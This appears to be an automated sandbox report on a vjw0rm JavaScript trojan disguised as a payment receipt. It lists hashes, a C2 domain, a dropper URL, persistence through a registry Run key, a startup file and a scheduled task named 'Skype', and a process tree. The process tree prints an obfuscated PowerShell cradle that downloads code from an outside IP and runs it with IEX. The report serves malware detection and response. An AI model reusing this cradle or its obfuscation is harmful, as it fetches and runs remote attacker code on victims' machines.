vjw0rm | 1462ec0ee24166bb000751db97514da4e7bd875fb960499ceefaa2142ec34649

General

Target

d2h8_Payment_receipt.js
Size

81KB
MD5

b28995f906c68033265eddd4465f25aa
SHA1

e96cd013b328a7740b2a73c3da0efe92d479f491
SHA256

1462ec0ee24166bb000751db97514da4e7bd875fb960499ceefaa2142ec34649
SHA512

395cde1555290656f88c35bea231b90336c8918685fbf9d6f9223c0c96f2cdfd984f8e085f669ce34d9e8318b275aecebe55ef614db3b8edbefa917007d9b62d

Score

10^/10

vjw0rm persistence trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://13.78.209.105/E/err.txt

Extracted

Family

vjw0rm

C2

http://6200js.duckdns.org:6200

Signatures

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm
Blocklisted process makes network request 1 IoCs

Processes:

wscript.exe

flow pid process

5 1048 wscript.exe

flow	pid	process
5	1048	wscript.exe

Drops startup file 2 IoCs

Processes:

wscript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2h8_Payment_receipt.js	wscript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2h8_Payment_receipt.js	wscript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

wscript.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\BB4HJP0E1C = "'C:\\Users\\Admin\\AppData\\Local\\Temp\\d2h8_Payment_receipt.js'"	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

392 schtasks.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1320 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1320 powershell.exe

pid	process
392	schtasks.exe

pid	process
1320	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1320	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

wscript.exeWScript.exe

description	pid	process	target process
PID 1048 wrote to memory of 392	1048	wscript.exe	schtasks.exe
PID 1048 wrote to memory of 392	1048	wscript.exe	schtasks.exe
PID 1048 wrote to memory of 392	1048	wscript.exe	schtasks.exe
PID 1048 wrote to memory of 1492	1048	wscript.exe	WScript.exe
PID 1048 wrote to memory of 1492	1048	wscript.exe	WScript.exe
PID 1048 wrote to memory of 1492	1048	wscript.exe	WScript.exe
PID 1492 wrote to memory of 1320	1492	WScript.exe	powershell.exe
PID 1492 wrote to memory of 1320	1492	WScript.exe	powershell.exe
PID 1492 wrote to memory of 1320	1492	WScript.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\d2h8_Payment_receipt.js
1⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\Admin\AppData\Local\Temp\d2h8_Payment_receipt.js
  2⤵
  - Creates scheduled task(s)
  PID:392
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FMYKISTYG7.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H ='http://13.78.209.105/E/err.txt';$H1 = '******************^^^^^^^^^^^^^^^^^^``````````````'.Replace('******************','n').Replace('^^^^^^^^^^^^^^^^^^','E').Replace('``````````````','t');$H2 ='DDDDDDDDEEEEEEEEEEE'.Replace('DDDDDDDD','.').Replace('EEEEEEEEEE','W');$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.Replace('NNNNNNNNNNNNNNNNTTTTTTTTTT','IE');$H3 ='LLLLLLLLLL'.Replace('LLLLLLLLL','bC');$HH =$H1+$H2+$H3+$H4;$HHH ='DO---------------nG'.Replace('---------------','WnLoaDSTrI');$HHHH ='I`---------------Ec++++++++++++++H).$HHH($H)'.Replace('`---------------','EX(ne`W`-Obj`').Replace('++++++++++++++','`T $H');&('I'+'EX')($HHHH -Join '')|&('I'+'EX');
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1320

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FMYKISTYG7.vbs

MD5
2b137d3d2ea7ddba63e99586f44e0388

SHA1
d4634061943a78624880537ffa65472fc6195474

SHA256
1af97b7b7febcf25481d8c653b141681be8a1cad29a563e9057c02c1c87b75c2

SHA512
6a7240273576e625066b114960fa4063acd9404727d02bcd3183248f5c820161ec15fafe01858d22ddcf39cd4d03f8e52988625aabd7b01565339b8927693115

Download Submit
memory/392-55-0x0000000000000000-mapping.dmp

Download
memory/1048-54-0x000007FEFC271000-0x000007FEFC273000-memory.dmp

Filesize
8KB

Download
memory/1320-59-0x0000000000000000-mapping.dmp

Download
memory/1320-61-0x000007FEF3110000-0x000007FEF3C6D000-memory.dmp

Filesize
11.4MB

Download
memory/1320-62-0x0000000002950000-0x0000000002952000-memory.dmp

Filesize
8KB

Download
memory/1320-63-0x0000000002952000-0x0000000002954000-memory.dmp

Filesize
8KB

Download
memory/1320-64-0x0000000002954000-0x0000000002957000-memory.dmp

Filesize
12KB

Download
memory/1320-65-0x000000001B720000-0x000000001BA1F000-memory.dmp

Filesize
3.0MB

Download
memory/1320-66-0x000000000295B000-0x000000000297A000-memory.dmp

Filesize
124KB

Download
memory/1492-56-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads